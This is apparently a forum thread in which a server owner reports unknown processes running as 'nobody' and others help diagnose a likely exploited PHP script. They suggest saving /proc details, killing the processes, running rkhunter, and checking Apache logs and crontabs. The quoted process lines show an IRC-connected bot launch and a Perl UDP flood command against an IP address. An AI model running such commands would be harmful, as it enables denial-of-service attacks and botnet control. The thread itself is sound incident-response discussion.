hi I saw this on my server running

nobody 16421 0.0 0.0 2096 4 ? S Nov29 0:00 sh -c ./stealth irc.undernet.org 53 2>&1 3>&1


how do I kill this? i did kill it actually by using kill then pid. but its still there.

how would I find who is running this?

how about this one? what is this?

nobody 15242 47.3 0.0 3116 640 ? R Nov29 348:43 perl udp.pl 193.110.95.1 6667 999999

nobody is of course :D </sarcasm>


Are you sure there are no other processes that are there to keep it up? I'm not linux expert however ><

i did asked because I want to know who is running it. or if there is a program that automatically runs this.

Looks like a php script was exploited on your server and someone is using your server for malicious purposes.

might want to start by running rkhunter and looking for any problems there

before you kill them, note down the values in /proc/<pid>/ for cmdline, cwd, environ, exe for forensic purposes.

then, kill -9 them off :)

thanks.. whats rkhunter?

rkhunter is a nice piece of software that allows you to check your system for common rookits, signs of rootkits, as well as outdated software

it most likely won't help too much in this situation, but it doesn't hurt to run it daily.
Installation:


wget http://downloads.rootkit.nl/rkhunter-1.1.8.tar.gz
tar zxfv rkhunter-1.1.8.tar.gz
cd rkhunter
./installer.sh


How to use:

rkhunter -c

thanks everyone. I still need to know though who runs this. I mean its my client.

What do you mean who runs it? It's being run as 'nobody' which, as Steve said, means it's likely to have been placed there via a bad PHP script since Apache runs as nobody. Right Steve?

Maybe grep through your Apache logs for that filename and try to find some activity.

Or just disable some functions in php.ini :)

Maybe it's a cronjob? grep -r "udp" /var/cron/tabs/

I doubt its a cronjob. It is more then likely an exploited php script.



Or just disable some functions in php.ini


That was not very helpful. That is just masking the problem. You need to get down to the root of the issue.